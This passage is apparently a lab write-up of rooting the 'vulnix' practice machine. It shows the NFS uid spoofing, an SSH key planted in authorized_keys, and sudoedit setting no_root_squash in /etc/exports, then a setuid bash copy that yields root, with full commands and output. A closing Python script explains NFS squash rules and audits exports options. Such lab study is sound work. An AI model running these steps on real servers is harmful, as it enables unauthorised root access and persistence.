# (eg. shared mailboxes or if same uid is used for multiple accounts).
#verbose_proctitle = no
# Should all processes be killed when Dovecot master process shuts down.
# Setting this to "no" means that Dovecot can be upgraded without
# forcing existing client connections to close (although that could also be
# a problem if the upgrade is e.g. because of a security fix).
#shutdown_clients = yes
# If non-zero, run mail commands via this many connections to doveadm server,
# instead of running them directly in the same process.
#doveadm_worker_count = 0
# UNIX socket or host:port used for connecting to doveadm server
#doveadm_socket_path = doveadm-server
# Space separated list of environment variables that are preserved on Dovecot
# startup and passed down to all of its child processes. You can also give
# key=value pairs to always set specific settings.
#import_environment = TZ
##
## Dictionary server settings
##
# Dictionary can be used to store key=value lists. This is used by several
# plugins. The dictionary can be accessed either directly or though a
# dictionary server. The following dict block maps dictionary names to URIs
# when the server is used. These can then be referenced using URIs in format
# "proxy::<name>".
dict {
#quota = mysql:/etc/dovecot/dovecot-dict-sql.conf.ext
#expire = sqlite:/etc/dovecot/dovecot-dict-sql.conf.ext
}
# Most of the actual configuration gets included below. The filenames are
# first sorted by their ASCII value and parsed in that order. The 00-prefixes
# in filenames are intended to make it easier to understand the ordering.
!include conf.d/*.conf
# A config file can also tried to be included without giving an error if
# it's not found:
!include_try local.conf
user@vulnix:~$ ls /etc/dovecot/conf.d
10-auth.conf 10-logging.conf 10-master.conf 15-lda.conf 20-pop3.conf 90-plugin.conf auth-deny.conf.ext auth-passwdfile.conf.ext auth-system.conf.ext
10-director.conf 10-mail.conf 10-ssl.conf 20-imap.conf 90-acl.conf 90-quota.conf auth-master.conf.ext auth-static.conf.ext auth-vpopmail.conf.ext
user@vulnix:~$ grep use_shell -- $(exim -bP configure_file)
The program 'exim' can be found in the following packages:
* exim4-daemon-heavy
* exim4-daemon-light
Ask your administrator to install one of them
Another dead end: no exim. I'm truly stumped here. I think what I'll do is stop trying to get root, try to get onto the other user, `vulnix`, and see what we can do from there...
Moving back to the NFS mount: we know vulnix's user ID now, so we should be able to abuse that (NFS trusts the UID the client presents) to mount it and get access to the vulnix user. Let's do that.
# On Remote
$ cat /etc/passwd
...
vulnix:x:2008:2008::/home/vulnix:/bin/bash
...
# Edit /etc/passwd on local machine to change vulnix user ID to be 2008
$ vim /etc/passwd
...
# Try to access the mounted NFS drive again
┌──(root💀kali)-[/mnt]
└─# ls
vulnix
┌──(root💀kali)-[/mnt]
└─# cd vulnix
cd: permission denied: vulnix
┌──(root💀kali)-[/mnt]
└─# ls 1 ⨯
vulnix
┌──(root💀kali)-[/mnt]
└─# ls -al
total 48
drwxr-xr-x 3 root root 4096 Jan 10 19:41 .
drwxr-xr-x 19 root root 36864 Nov 17 09:13 ..
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 vulnix
┌──(root💀kali)-[/mnt]
└─# su vulnix
┌──(vulnix㉿kali)-[/mnt]
└─$ cd vulnix/
┌──(vulnix㉿kali)-[/mnt/vulnix]
└─$ ls
┌──(vulnix㉿kali)-[/mnt/vulnix]
└─$ ls -al
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxr-xr-x 3 root root 4096 Jan 10 19:41 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
...
Wohoo! Okay, now let's get SSH access to this user.
# On the mounted share, as the local vulnix user
$ mkdir .ssh && cd .ssh
$ cat ~/.ssh/id_rsa.pub > authorized_keys
$ ssh vulnix@192.168.173.130
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
Sweet, now what can we do...
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
Oh shit, that was fast: we can edit exports to give ourselves no_root_squash and we win!
I used sudoedit to change root_squash -> no_root_squash, but how do I get the machine to update the config... I could cheat and reboot the machine but that's unrealistic.
Here it says we just need to run `exportfs`, but we don't have permission to do so.
I tried to find a vector to reboot (without just getting root with old software or a kernel exploit) for a longggg time. I couldn't come up with anything.
So, my reasoning for this cheat is that eventually every real server will reboot, so in the real world we would just wait for that moment. I rebooted the damn thing...
# On host
┌──(root💀kali)-[/mnt]
└─$ sudo mount -t nfs 192.168.173.130:/home/vulnix /mnt/vulnix -o nolock
┌──(root💀kali)-[/mnt]
└─$ cd vulnix
# On target
$ cp /bin/bash ~/x
# On host
$ cp /mnt/vulnix/x /mnt/vulnix/y
$ chmod 4777 /mnt/vulnix/y
# On target
vulnix@vulnix:~$ ./y -p
y-4.2# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) groups=0(root),2008(vulnix)
y-4.2# cd /root
y-4.2# ls
trophy.txt
y-4.2# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
Finally, we win! This one took a long time, but I learned a lot and enjoyed the restriction of not being able to just use an exploit chain with Metasploit or something.
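As an added example (not from the original write-up), here is the access-control model that made both NFS tricks above work: under AUTH_SYS the server trusts whatever uid/gid the client asserts and only rewrites it in the squash cases, so giving a local account the `vulnix` uid grants that user's access, and `no_root_squash` hands a client root server root. The exports parser, the squash logic and the audit checks are mine; the two export lines are the one found in /etc/exports and the edited one, and the other export lines used in the demonstration are constructed.

```python
"""How an NFS server using AUTH_SYS (sec=sys) treats the identity a client
claims, and which /etc/exports options make a share risky.
Added example, not part of the original write-up.
"""
import re
from dataclasses import dataclass

ANON_ID = 65534  # exportfs default for anonuid/anongid (nobody/nogroup)


@dataclass
class Export:
    path: str
    host: str
    options: tuple

    def has(self, name):
        return name in self.options

    def value(self, name, default):
        for opt in self.options:
            if opt.startswith(name + "="):
                return int(opt.split("=", 1)[1])
        return default

    def auth_flavors(self):
        """Security flavors accepted, e.g. ['krb5p', 'sys']; exportfs defaults to sys."""
        for opt in self.options:
            if opt.startswith("sec="):
                return opt[4:].split(":")
        return ["sys"]


def parse_exports(text):
    """Parse exports(5) lines: '<path> <host>(opt,opt) <host2>(opt)'."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split(None, 1)
        path = fields[0]
        hosts = fields[1] if len(fields) > 1 else "*"   # no host list means everyone
        for host, opts in re.findall(r"(\S+?)(?:\(([^)]*)\))?(?:\s+|$)", hosts):
            options = tuple(o.strip() for o in opts.split(",") if o.strip())
            exports.append(Export(path, host, options))
    return exports


def effective_identity(export, uid, gid):
    """Identity the server uses for an AUTH_SYS request claiming uid/gid.

    Nothing authenticates the claim; the server only rewrites it when a
    squash option applies. A client that gives a local account the export
    owner's uid therefore passes the permission check unchanged.
    """
    anon = (export.value("anonuid", ANON_ID), export.value("anongid", ANON_ID))
    if export.has("all_squash"):
        return anon
    if uid == 0 and not export.has("no_root_squash"):   # root_squash is the default
        return anon
    return (uid, gid)


def audit(export):
    """Findings a reviewer would raise about one export entry."""
    findings = []
    if "*" in export.host or "?" in export.host:
        findings.append(f"wildcard host '{export.host}': any matching client may mount")
    if "sys" in export.auth_flavors():
        findings.append("sec=sys: uid/gid are client-asserted, not authenticated")
    if export.has("no_root_squash"):
        findings.append("no_root_squash: a remote root is root on this share")
    if export.has("rw") and not export.has("all_squash"):
        findings.append("rw without all_squash: any client-chosen uid can write as that uid")
    if export.has("insecure"):
        findings.append("insecure: requests accepted from unprivileged source ports")
    return findings


FOUND = "/home/vulnix *(rw,root_squash)"      # as read from /etc/exports on the box
EDITED = "/home/vulnix *(rw,no_root_squash)"  # after the sudoedit

if __name__ == "__main__":
    for text in (FOUND, EDITED):
        (exp,) = parse_exports(text)
        print(text)
        print("  client root (0,0)    ->", effective_identity(exp, 0, 0))
        print("  client vulnix (2008) ->", effective_identity(exp, 2008, 2008))
        for finding in audit(exp):
            print("  !", finding)
```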